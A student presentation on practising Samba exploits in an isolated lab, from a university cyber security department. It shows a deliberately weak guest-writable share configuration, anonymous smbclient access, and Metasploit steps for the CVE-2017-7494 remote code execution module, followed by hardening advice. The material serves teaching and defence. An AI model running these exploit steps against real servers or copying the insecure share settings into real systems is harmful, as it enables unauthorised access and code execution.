Title Slide

"Practicing Vulnerability Exploits Using Samba Services"

Presented by: Mudasir
Mehran University, Cyber Security Department
22BSCYS028

Slide 2: Introduction to Samba

 What is Samba?
o Samba is an open-source software that allows file and print sharing
between Linux and Windows systems.
o Widely used in corporate networks for cross-platform interoperability.

 Why Target Samba?

o Since Samba connects different OS environments, it can be vulnerable
to specific types of network-based attacks.
o Understanding its vulnerabilities helps in hardening network security
and preventing data breaches.

Slide 3: Common Vulnerabilities in Samba

1. Privilege Escalation – Allows attackers to gain elevated access.
2. Unauthenticated Access – Can allow access without valid credentials.
3. Remote Code Execution (RCE) – Allows attackers to execute code on the
server.
4. SMB Relay Attacks – Common in man-in-the-middle (MITM) scenarios.
Examples: CVE-2017-7494 (Remote Code Execution), CVE-2021-44142 (Out-of-
bounds heap read/write).

Slide 4: Setting Up a Samba Vulnerability Lab (Practical Setup)

1. Install Samba on a Linux Virtual Machine (VM) or isolated system
sudo apt update
sudo apt install samba
Configure a Vulnerable Samba Share:
 Edit the Samba configuration file /etc/samba/smb.conf.
 Add a share with weak permissions for testing

Code
bash
[testshare]
path = /srv/samba/testshare
read only = no
guest ok = yes

Restart the Samba service:

bash
Copy code
sudo systemctl restart smbd
3 Set up a Client on another VM to connect and test.
Practical Demonstration: Exploiting Unauthenticated Access
1. Goal: Access shared files without credentials.
2. Method: Use SMBClient, a Samba client, to access the share as a guest

bash
Copy code
smbclient //<target_ip>/testshare -N

Outcome: Accessing the share without a password, demonstrating weak permissions.

Demonstration: Exploiting Remote Code Execution (RCE)

1. Goal: Execute commands remotely by exploiting RCE vulnerability (e.g., CVE-2017-
7494).
2. Method: Use Metasploit or Python scripts targeting the RCE vulnerability.
Example with Metasploit:
bash
Copy code
msfconsole
use exploit/linux/samba/is_known_pipename
set RHOST <target_ip>
exploit
 Outcome: Command execution on the Samba server, demonstrating RCE

1. Restrict Samba Access:

Use firewalls to limit access to trusted IPs.
Disable guest access in /etc/samba/smb.conf.
2. Apply Patches:
Regularly update Samba to patch known vulnerabilities.
3. Use Strong Authentication:
Enforce username/password authentication and disable null sessions.
4. Monitor and Log Activity:
Enable logging in Samba to detect unusual activity.

Slide 8: Conclusion
 Summary: Demonstrated the importance of understanding Samba vulnerabilities.
 Security Impact: Knowledge of vulnerabilities helps in developing better defenses and
securing networks.
 Q&A: Open floor for questions.